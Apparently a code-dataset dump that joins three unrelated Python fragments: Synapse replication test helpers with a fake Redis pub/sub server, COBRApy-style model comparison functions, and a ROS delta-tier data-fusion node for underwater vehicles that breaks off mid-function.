Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
# Set up the server side protocol
channel = self.site.buildProtocol(None)
# hook into the channel's request factory so that we can keep a record
# of the requests
requests: List[SynapseRequest] = []
real_request_factory = channel.requestFactory
def request_factory(*args, **kwargs):
request = real_request_factory(*args, **kwargs)
requests.append(request)
return request
channel.requestFactory = request_factory
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
# there should have been exactly one request
self.assertEqual(len(requests), 1)
return requests[0]
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
path: bytes = request.path # type: ignore
self.assertRegex(
path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
# We may have an attempt to connect to redis for the external cache already.
self.connect_any_redis_attempts()
store = self.hs.get_datastores().main
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "172.16.31.10"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost",
6379,
self.connect_any_redis_attempts,
)
self.hs.get_replication_command_handler().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
# automatically set up the connection. This is so that tests don't
# manually have to go and explicitly set it up each time (plus sometimes
# it is impossible to write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`."""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
# subclassses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: Optional[dict] = None, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
extra_config: Any extra config to use for this instances.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `federation_http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config or {})
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (
instance_name,
instance_loc.host,
)
)
# Copy the port into a new, non-Optional variable so mypy knows we're
# not going to reset `instance_loc` to `None` under its feet. See
# https://mypy.readthedocs.io/en/latest/common_issues.html#narrowing-and-inner-functions
port = instance_loc.port
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(worker_hs, port),
)
store = worker_hs.get_datastores().main
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs,
"client",
"test",
self.clock,
repl_handler,
)
server = self.server_factory.buildProtocol(
IPv4Address("TCP", "127.0.0.1", 0)
)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
max_request_body_size=4096,
reactor=self.reactor,
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_replication_command_handler().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
# last is one to the HTTP repication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
# Set up the server side protocol
channel = self._hs_to_site[hs].buildProtocol(None)
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
# inside `connecTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
while clients:
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
class TestReplicationDataHandler(ReplicationDataHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows: List[Tuple[str, int, Any]] = []
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
class FakeRedisPubSubServer:
"""A fake Redis server for pub/sub."""
def __init__(self):
self._subscribers = set()
def add_subscriber(self, conn):
"""A connection has called SUBSCRIBE"""
self._subscribers.add(conn)
def remove_subscriber(self, conn):
"""A connection has called UNSUBSCRIBE"""
self._subscribers.discard(conn)
def publish(self, conn, channel, msg) -> int:
"""A connection want to publish a message to subscribers."""
for sub in self._subscribers:
sub.send(["message", channel, msg])
return len(self._subscribers)
def buildProtocol(self, addr):
return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
"""A connection from a client talking to the fake Redis server."""
transport: Optional[FakeTransport] = None
def __init__(self, server: FakeRedisPubSubServer):
self._server = server
self._reader = hiredis.Reader()
def dataReceived(self, data):
self._reader.feed(data)
# We might get multiple messages in one packet.
while True:
msg = self._reader.gets()
if msg is False:
# No more messages.
return
if not isinstance(msg, list):
# Inbound commands should always be a list
raise Exception("Expected redis list")
self.handle_command(msg[0], *msg[1:])
def handle_command(self, command, *args):
"""Received a Redis command from the client."""
# We currently only support pub/sub.
if command == b"PUBLISH":
channel, message = args
num_subscribers = self._server.publish(self, channel, message)
self.send(num_subscribers)
elif command == b"SUBSCRIBE":
(channel,) = args
self._server.add_subscriber(self)
self.send(["subscribe", channel, 1])
# Since we use SET/GET to cache things we can safely no-op them.
elif command == b"SET":
self.send("OK")
elif command == b"GET":
self.send(None)
else:
raise Exception("Unknown command")
def send(self, msg):
"""Send a message back to the client."""
assert self.transport is not None
raw = self.encode(msg).encode("utf-8")
self.transport.write(raw)
self.transport.flush()
def encode(self, obj):
"""Encode an object to its Redis format.
Supports: strings/bytes, integers and list/tuples.
"""
if isinstance(obj, bytes):
# We assume bytes are just unicode strings.
obj = obj.decode("utf-8")
if obj is None:
return "$-1\r\n"
if isinstance(obj, str):
return f"${len(obj)}\r\n{obj}\r\n"
if isinstance(obj, int):
return f":{obj}\r\n"
if isinstance(obj, (list, tuple)):
items = "".join(self.encode(a) for a in obj)
return f"*{len(obj)}\r\n{items}"
raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)
def connectionLost(self, reason):
self._server.remove_subscriber(self)
| StarcoderdataPython |
11156 |
def compareMetaboliteDicts(d1, d2):
sorted_d1_keys = sorted(d1.keys())
sorted_d2_keys = sorted(d2.keys())
for i in range(len(sorted_d1_keys)):
if not compareMetabolites(sorted_d1_keys[i], sorted_d2_keys[i], naive=True):
return False
elif not d1[sorted_d1_keys[i]] == d2[sorted_d2_keys[i]]:
return False
else:
return True
def compareMetabolites(met1, met2, naive=False):
if isinstance(met1, set):
return compareReactions(list(met1), list(met2), naive)
if isinstance(met1, list):
if not isinstance(met2, list):
return False
elif len(met1) != len(met2):
return False
else:
for i in range(len(met1)):
if not compareMetabolites(met1[i], met2[i], naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
elif not met1._bound == met2._bound:
return False
elif not met1._constraint_sense == met2._constraint_sense:
return False
#elif not met1.annotation == met2.annotation:
# return False
elif not met1.charge == met2.charge:
return False
elif not met1.compartment == met2.compartment:
return False
elif not met1.name == met2.name:
return False
elif not met1.compartment == met2.compartment:
return False
#elif not met1.notes == met2.notes:
# return False
elif not naive:
if not compareReactions(met1._reaction, met2._reaction, naive=True):
return False
elif not compareModels(met1._model, met2._model, naive=True):
return False
else:
return True
else:
return True
def compareReactions(r1, r2, naive=False):
if isinstance(r1, set):
return compareReactions(list(r1), list(r2), naive)
if isinstance(r1, list):
if not isinstance(r2, list):
return False
elif len(r1) != len(r2):
return False
else:
for i in range(len(r1)):
if not compareReactions(r1[i], r2[i],naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
#elif not r1._compartments == r2._compartments:
# return False
#elif not r1._forward_variable == r2._forward_variable:
# return False
elif not r1._gene_reaction_rule == r2._gene_reaction_rule:
return False
elif not r1._id == r2._id:
return False
elif not r1._lower_bound == r2._lower_bound:
return False
#elif not r1._model == r2._model:
# return False
#elif not r1._reverse_variable == r2._reverse_variable:
# return False
elif not r1._upper_bound == r2._upper_bound:
return False
#elif not r1.annotation == r2.annotation:
# return False
elif not r1.name== r2.name:
return False
#elif not r1.notes == r2.notes:
# return False
elif not r1.subsystem == r2.subsystem:
return False
elif not r1.variable_kind == r2.variable_kind:
return False
elif not naive:
if not compareMetaboliteDicts(r1._metabolites, r2._metabolites):
return False
elif not compareGenes(r1._genes,r2._genes, naive=True):
return False
else:
return True
else:
return True
def compareGenes(g1, g2, naive=False):
if isinstance(g1, set):
return compareGenes(list(g1), list(g2), naive)
if isinstance(g1, list):
if not isinstance(g2, list):
return False
elif len(g1) != len(g2):
return False
else:
for i in range(len(g1)):
if not compareGenes(g1[i], g2[i], naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
elif not g1._functional == g2._functional:
return False
elif not g1._id == g2._id:
return False
#elif not g1._model == g2._model:
# return False
elif not g1.annotation == g2.annotation:
return False
elif not g1.name == g2.name:
return False
#elif not g1.notes == g2.notes:
# return False
elif not naive:
if not compareReactions(g1._reaction,g2._reaction, naive=True):
return False
else:
return True
else:
return True
def compareModels(m1, m2, naive=False):
if not True:
#can never be entered
pass
#elif not m1._compartments == m2._compartments:
# return False
#elif not m1._contexts == m2._contexts:
# return False
#elif not m1._solver == m2._solver:
# return False
elif not m1._id == m2._id:
return False
#elif not m1._trimmed == m2.trimmed:
# return False
#elif not m1._trimmed_genes == m2._trimmed_genes:
# return False
#elif not m1._trimmed_reactions == m2._trimmed_reactions:
# return False
#elif not m1.annotation == m2.annotation:
# return False
elif not m1.bounds == m2.bounds:
return False
elif not m1.name == m2.name:
return False
#elif not m1.notes == m2.notes:
# return False
#elif not m1.quadratic_component == m2.quadratic_component:
# return False
elif not naive:
if not compareGenes(m1.genes, m2.genes):
return False
elif not compareMetabolites(m1.metabolites, m2.metabolites):
return False
elif not compareReactions(m1.reactions,m2.reactions):
return False
else:
return True
else:
return True
| StarcoderdataPython |
102565 | #!/usr/bin/env python
from __future__ import division
"""@package etddf
ROS interface script for delta tiering filter
Filter operates in ENU
"""
from etddf.delta_tier import DeltaTier
import rospy
import threading
from minau.msg import ControlStatus
from etddf.msg import Measurement, MeasurementPackage, NetworkEstimate, AssetEstimate, EtddfStatistics, PositionVelocity
from etddf.srv import GetMeasurementPackage
import numpy as np
import tf
np.set_printoptions(suppress=True)
from copy import deepcopy
from std_msgs.msg import Header, Float64
from geometry_msgs.msg import PoseWithCovariance, Pose, Point, Quaternion, Twist, Vector3, TwistWithCovariance, PoseWithCovarianceStamped
from nav_msgs.msg import Odometry
from minau.msg import SonarTargetList, SonarTarget
from cuprint.cuprint import CUPrint
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, COHRINT Lab"
__email__ = "<EMAIL>"
__status__ = "Development"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__version__ = "3.0"
NUM_OWNSHIP_STATES = 6
class ETDDF_Node:
def __init__(self, my_name, \
update_rate, \
delta_tiers, \
asset2id, \
delta_codebook_table, \
buffer_size, \
meas_space_table, \
missed_meas_tolerance_table, \
x0,\
P0,\
Q,\
default_meas_variance,
use_control_input):
self.update_rate = update_rate
self.asset2id = asset2id
self.Q = Q
self.use_control_input = use_control_input
self.default_meas_variance = default_meas_variance
self.my_name = my_name
self.landmark_dict = rospy.get_param("~landmarks", {})
self.cuprint = CUPrint(rospy.get_name())
self.filter = DeltaTier(NUM_OWNSHIP_STATES, \
x0,\
P0,\
buffer_size,\
meas_space_table,\
missed_meas_tolerance_table, \
delta_codebook_table,\
delta_tiers,\
self.asset2id,\
my_name)
self.network_pub = rospy.Publisher("etddf/estimate/network", NetworkEstimate, queue_size=10)
self.statistics_pub = rospy.Publisher("etddf/statistics", EtddfStatistics, queue_size=10)
self.statistics = EtddfStatistics(0, rospy.get_rostime(), 0, 0, delta_tiers, [0 for _ in delta_tiers], 0.0, [], False)
self.asset_pub_dict = {}
for asset in self.asset2id.keys():
if "surface" in asset:
continue
self.asset_pub_dict[asset] = rospy.Publisher("etddf/estimate/" + asset, Odometry, queue_size=10)
self.update_seq = 0
self.last_depth_meas = None
rospy.sleep(rospy.Duration(1 / self.update_rate))
self.last_update_time = rospy.get_rostime() - rospy.Duration(1 / self.update_rate)
self.meas_lock = threading.Lock()
self.update_lock = threading.Lock()
self.last_orientation = None
self.red_asset_found = False
self.red_asset_names = rospy.get_param("~red_team_names")
# Depth Sensor
if rospy.get_param("~measurement_topics/depth") != "None":
rospy.Subscriber(rospy.get_param("~measurement_topics/depth"), Float64, self.depth_callback, queue_size=1)
# Modem & Measurement Packages
rospy.Subscriber("etddf/packages_in", MeasurementPackage, self.meas_pkg_callback, queue_size=1)
if self.use_control_input:
self.control_input = None
rospy.Subscriber("uuv_control/control_status", ControlStatus, self.control_status_callback, queue_size=1)
if rospy.get_param("~strapdown"):
rospy.Subscriber(rospy.get_param("~measurement_topics/imu_est"), Odometry, self.orientation_estimate_callback, queue_size=1)
rospy.wait_for_message(rospy.get_param("~measurement_topics/imu_est"), Odometry)
# IMU Covariance Intersection
if rospy.get_param("~strapdown") and rospy.get_param("~measurement_topics/imu_ci") != "None":
self.cuprint("Intersecting with strapdown")
self.intersection_pub = rospy.Publisher("strapdown/intersection_result", PositionVelocity, queue_size=1)
rospy.Subscriber(rospy.get_param("~measurement_topics/imu_ci"), PositionVelocity, self.nav_filter_callback, queue_size=1)
else:
self.cuprint("Not intersecting with strapdown filter")
rospy.Timer(rospy.Duration(1 / self.update_rate), self.no_nav_filter_callback)
# Sonar Subscription
if rospy.get_param("~measurement_topics/sonar") != "None":
rospy.Subscriber(rospy.get_param("~measurement_topics/sonar"), SonarTargetList, self.sonar_callback)
self.data_x, self.data_y = None, None
# rospy.Subscriber("pose_gt", Odometry, self.gps_callback, queue_size=1)
# Initialize Buffer Service
rospy.Service('etddf/get_measurement_package', GetMeasurementPackage, self.get_meas_pkg_callback)
self.cuprint("loaded")
def gps_callback(self, msg):
self.data_x = msg.pose.pose.position.x + np.random.normal(0, scale=0.05)
self.data_y = msg.pose.pose.position.y + np.random.normal(0, scale=0.05)
def orientation_estimate_callback(self, odom):
self.meas_lock.acquire()
self.last_orientation = odom.pose.pose.orientation
self.last_orientation_cov = np.array(odom.pose.covariance).reshape(6,6)
self.last_orientation_dot = odom.twist.twist.angular
self.last_orientation_dot_cov = np.array(odom.twist.covariance).reshape(6,6)
self.meas_lock.release()
def sonar_callback(self, sonar_list):
for target in sonar_list.targets:
# self.cuprint("Receiving sonar measurements")
if self.last_orientation is None: # No orientation, no linearization of the sonar measurement
# print("no ori")
return
if target.id == "detection":
continue
# self.cuprint("Receiving sonar data")
# Convert quaternions to Euler angles.
self.meas_lock.acquire()
(r, p, y) = tf.transformations.euler_from_quaternion([self.last_orientation.x, \
self.last_orientation.y, self.last_orientation.z, self.last_orientation.w])
self.meas_lock.release()
# y = (np.pi/180.0) * 8
bearing_world = y + target.bearing_rad
z = target.range_m * np.sin(target.elevation_rad)
xy_dist = target.range_m * np.cos(target.elevation_rad)
x = xy_dist * np.cos(bearing_world)
y = xy_dist * np.sin(bearing_world)
now = rospy.get_rostime()
sonar_x, sonar_y = None, None
if "landmark_" in target.id:
sonar_x = Measurement("sonar_x", now, self.my_name, "", x, self.default_meas_variance["sonar_x"], self.landmark_dict[target.id[len("landmark_"):]])
sonar_y = Measurement("sonar_y", now, self.my_name, "", y, self.default_meas_variance["sonar_x"], self.landmark_dict[target.id[len("landmark_"):]])
else:
sonar_x = Measurement("sonar_x", now, self.my_name, target.id, x, self.default_meas_variance["sonar_x"], [])
sonar_y = Measurement("sonar_y", now, self.my_name, target.id, y, self.default_meas_variance["sonar_y"], [])
if target.id in self.red_asset_names and not self.red_asset_found:
self.cuprint("Red Asset detected!")
self.red_asset_found = True
# sonar_z = Measurement("sonar_z", now, self.my_name, target.id, z, self.default_meas_variance["sonar_z"], []
self.filter.add_meas(sonar_x)
self.filter.add_meas(sonar_y)
# self.filter.add_meas(sonar_z)
# self.cuprint("meas added")
def publish_stats(self, last_update_time):
self.statistics.seq = self.update_seq
self.statistics.stamp = last_update_time
self.statistics.overflown, delta, buffer = self.filter.peek_buffer()
self.statistics.current_lowest_multiplier = delta
meas_name_list = [x.meas_type for x in buffer]
self.statistics.current_lowest_buffer = meas_name_list
self.statistics_pub.publish(self.statistics)
def no_nav_filter_callback(self, event):
t_now = rospy.get_rostime()
delta_t_ros = t_now - self.last_update_time
self.update_lock.acquire()
### Run Prediction ###
### Run Prediction ###
if self.use_control_input and self.control_input is not None:
self.filter.predict(self.control_input, self.Q, delta_t_ros.to_sec(), False)
else:
self.filter.predict(np.zeros((3,1)), self.Q, delta_t_ros.to_sec(), False)
### Run Correction ###
# Construct depth measurement
z_r = self.default_meas_variance["depth"]
z_data = self.last_depth_meas
if z_data != None:
z = Measurement("depth", t_now, self.my_name,"", z_data, z_r, [])
self.filter.add_meas(z)
self.last_depth_meas = None
# correction
self.filter.correct(t_now)
self.publish_estimates(t_now)
self.last_update_time = t_now
self.update_seq += 1
self.update_lock.release()
self.publish_stats(t_now)
def nav_filter_callback(self, pv_msg):
# Update at specified rate
t_now = rospy.get_rostime()
delta_t_ros = t_now - self.last_update_time
if delta_t_ros < rospy.Duration(1/self.update_rate):
return
self.update_lock.acquire()
### Run Prediction ###
if self.use_control_input and self.control_input is not None:
self.filter.predict(self.control_input, self.Q, delta_t_ros.to_sec(), False)
else:
self.filter.predict(np.zeros((3,1)), self.Q, delta_t_ros.to_sec(), False)
### Run Correction ###
# Construct depth measurement
z_r = self.default_meas_variance["depth"]
z_data = self.last_depth_meas
if z_data != None:
z = Measurement("depth", t_now, self.my_name,"", z_data, z_r, []) # Flip z data to transform enu -> NED
self.filter.add_meas(z)
self.last_depth_meas = None
if self.data_x != None:
x = Measurement("gps_x", t_now, self.my_name,"", self.data_x, 0.1, [])
self.filter.add_meas(x)
self.data_x = None
if self.data_y != None:
y = Measurement("gps_y", t_now, self.my_name,"", self.data_y, 0.1, [])
self.filter.add_meas(y)
self.data_y = None
# correction
self.filter.correct(t_now)
### Covariancee Intersect ###
# Turn odom estimate into numpy
mean = np.array([[pv_msg.position.x, pv_msg.position.y, pv_msg.position.z, \
pv_msg.velocity.x, pv_msg.velocity.y, pv_msg.velocity.z]]).T
cov = np.array(pv_msg.covariance).reshape(6,6)
# Run covariance intersection
c_bar, Pcc = self.filter.intersect(mean, cov)
position = Vector3(c_bar[0,0], c_bar[1,0], c_bar[2,0])
velocity = Vector3(c_bar[3,0], c_bar[4,0], c_bar[5,0])
covariance = list(Pcc.flatten())
new_pv_msg = PositionVelocity(position, velocity, covariance)
self.intersection_pub.publish(new_pv_msg)
self.publish_estimates(t_now)
self.last_update_time = t_now
self.update_seq += 1
self.update_lock.release()
self.publish_stats(t_now)
def control_status_callback(self, msg):
self.update_lock.acquire()
if msg.is_setpoint_active and msg.is_heading_velocity_setpoint_active:
self.control_input = np.array([[msg.setpoint_velocity.y, msg.setpoint_velocity.z, -msg.setpoint_velocity.z]]).T
else:
self.control_input = None
# GRAB CONTROL INPUT
self.update_lock.release()
def depth_callback(self, msg):
self.meas_lock.acquire()
self.last_depth_meas = msg.data
self.meas_lock.release()
def publish_estimates(self, timestamp):
ne = NetworkEstimate()
for asset in self.asset2id.keys():
if "surface" in asset:
continue
if "red" in asset and not self.red_asset_found:
continue
# else:
# print("publishing " + asset + "'s estimate")
# Construct Odometry Msg for Asset
mean, cov = self.filter.get_asset_estimate(asset)
pose_cov = np.zeros((6,6))
pose_cov[:3,:3] = cov[:3,:3]
if asset == self.my_name:
pose = Pose(Point(mean[0],mean[1],mean[2]), \
self.last_orientation)
pose_cov[3:,3:] = self.last_orientation_cov[3:,3:]
else:
pose = Pose(Point(mean[0],mean[1],mean[2]), \
Quaternion(0,0,0,1))
pose_cov[3:,3:] = np.eye(3) * 3
pwc = PoseWithCovariance(pose, list(pose_cov.flatten()))
twist_cov = np.zeros((6,6))
twist_cov[:3,:3] = cov[3:6,3:6]
if asset == self.my_name:
tw = Twist(Vector3(mean[3],mean[4],mean[5]), self.last_orientation_dot)
twist_cov[3:, 3:] = self.last_orientation_dot_cov[3:,3:]
else:
tw = Twist(Vector3(mean[3],mean[4],mean[5]), Vector3(0,0,0))
twist_cov[3:, 3:] = np.eye(3) * -1
twc = TwistWithCovariance(tw, list(twist_cov.flatten()))
h = Header(self.update_seq, timestamp, "map")
o = Odometry(h, "map", pwc, twc)
ae = AssetEstimate(o, asset)
ne.assets.append(ae)
self.asset_pub_dict[asset].publish(o)
self.network_pub.publish(ne)
def meas_pkg_callback(self, msg):
# Modem Meas taken by surface
if msg.src_asset == "surface":
self.cuprint("Receiving Surface Modem Measurements")
for meas in msg.measurements:
# Approximate the fuse on the next update, so we can get other asset's position immediately
if meas.meas_type == "modem_elevation":
rospy.logerr("Ignoring Modem Elevation Measurement since we have depth measurements")
continue
elif meas.meas_type == "modem_azimuth":
meas.global_pose = list(meas.global_pose)
# self.cuprint("azimuth: " + str(meas.data))
meas.data = (meas.data * np.pi) / 180
meas.variance = self.default_meas_variance["modem_azimuth"]
elif meas.meas_type == "modem_range":
meas.global_pose = list(meas.global_pose)
# self.cuprint("range: " + str(meas.data))
meas.variance = self.default_meas_variance["modem_range"]
self.filter.add_meas(meas, force_fuse=True)
# Modem Meas taken by me
elif msg.src_asset == self.my_name:
# self.cuprint("Receiving Modem Measurements Taken by Me")
for meas in msg.measurements:
# Approximate the fuse on the next update, so we can get other asset's position immediately
if meas.meas_type == "modem_elevation":
rospy.logerr("Ignoring Modem Elevation Measurement since we have depth measurements")
continue
elif meas.meas_type == "modem_azimuth":
meas.global_pose = list(meas.global_pose)
meas.data = (meas.data * np.pi) / 180
meas.variance = self.default_meas_variance["modem_azimuth"]
elif meas.meas_type == "modem_range":
meas.global_pose = list(meas.global_pose)
meas.variance = self.default_meas_variance["modem_range"]
self.filter.add_meas(meas, force_fuse=True)
# Buffer
else:
self.cuprint("receiving buffer")
self.update_lock.acquire()
# Loop through buffer and see if we've found the red agent
for m in msg.measurements:
if m.measured_asset in self.red_asset_names and not self.red_asset_found:
self.red_asset_found = True
self.cuprint("Red asset measurement received!")
implicit_cnt, explicit_cnt = self.filter.catch_up(msg.delta_multiplier, msg.measurements)
self.cuprint("...caught up")
self.update_lock.release()
self.statistics.implicit_count += implicit_cnt
self.statistics.explicit_count += explicit_cnt
def get_meas_pkg_callback(self, req):
self.cuprint("pulling buffer")
delta, buffer = self.filter.pull_buffer()
ind = self.statistics.delta_tiers.index(delta)
self.statistics.buffer_counts[ind] += 1
mp = MeasurementPackage(buffer, self.my_name, delta)
print(mp)
return mp
################################
### Initialization Functions ###
################################
def get_indices_from_asset_names(blue_team):
my_name = rospy.get_param("~my_name")
red_team = rospy.get_param("~red_team_names")
asset2id = {}
asset2id[my_name] = 0
next_index = 1
for asset in blue_team:
if asset == my_name:
continue
else:
asset2id[asset] = next_index
next_index += 1
for asset in red_team:
asset2id[asset] = next_index
next_index += 1
if my_name != "surface":
asset2id["surface"] = -1 # arbitrary negative number
return asset2id
def get_delta_codebook_table():
delta_codebook = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
base_et_delta = meas_info[meas]["base_et_delta"]
delta_codebook[meas] = base_et_delta
return delta_codebook
def get_missed_meas_tolerance_table():
meas_tolerance_table = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
meas_tolerance_table[meas] = meas_info[meas]["missed_tolerance"]
return meas_tolerance_table
def get_meas_space_table():
meas_space_table = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
meas_space_table[meas] = meas_info[meas]["buffer_size"]
meas_space_table["bookstart"] = rospy.get_param("~buffer_space/bookstart")
meas_space_table["bookend"] = rospy.get_param("~buffer_space/bookend")
meas_space_table["final_time"] = rospy.get_param("~buffer_space/final_time")
return meas_space_table
def _dict2arr(d):
return np.array([[d["x"]],\
[d["y"]],\
[d["z"]],\
[d["x_vel"]], \
[d["y_vel"]],\
[d["z_vel"]]])
def _list2arr(l):
return np.array([l]).reshape(-1,1)
def _add_velocity_states(base_states):
velocities = np.zeros((base_states.size,1))
return np.concatenate((base_states, velocities), axis=0)
def get_initial_estimate(num_states, blue_team_names, blue_team_positions):
default_starting_position = _dict2arr(rospy.get_param("~default_starting_position"))
uncertainty_known_starting_position = _dict2arr( rospy.get_param("~initial_uncertainty/known_starting_position"))
uncertainty_unknown_starting_position = _dict2arr( rospy.get_param("~initial_uncertainty/unknown_starting_position"))
my_starting_position = rospy.get_param("~starting_position")
if not my_starting_position:
my_starting_position = deepcopy(default_starting_position)
else:
my_starting_position = _add_velocity_states( _list2arr(my_starting_position))
ownship_uncertainty = _dict2arr( rospy.get_param("~initial_uncertainty/ownship") )
uncertainty = np.zeros((num_states,num_states))
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[:NUM_OWNSHIP_STATES] = ownship_uncertainty
uncertainty += np.eye(num_states) * uncertainty_vector
state_vector = my_starting_position
my_name = rospy.get_param("~my_name")
red_team_names = rospy.get_param("~red_team_names")
next_index_unc = 1
next_index_pos = 1
for asset in blue_team_names:
if asset == my_name:
next_index_pos += 1
continue
if len(blue_team_positions) >= next_index_pos: # we were given the positione of this asset in roslaunch
next_position = _add_velocity_states( _list2arr( blue_team_positions[next_index_pos-1]))
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_known_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
else:
next_position = deepcopy(default_starting_position)
uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_unknown_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
state_vector = np.concatenate((state_vector, next_position),axis=0)
next_index_unc += 1
next_index_pos += 1
for asset in red_team_names:
next_position = deepcopy(default_starting_position)
state_vector = np.concatenate((state_vector, next_position),axis=0)
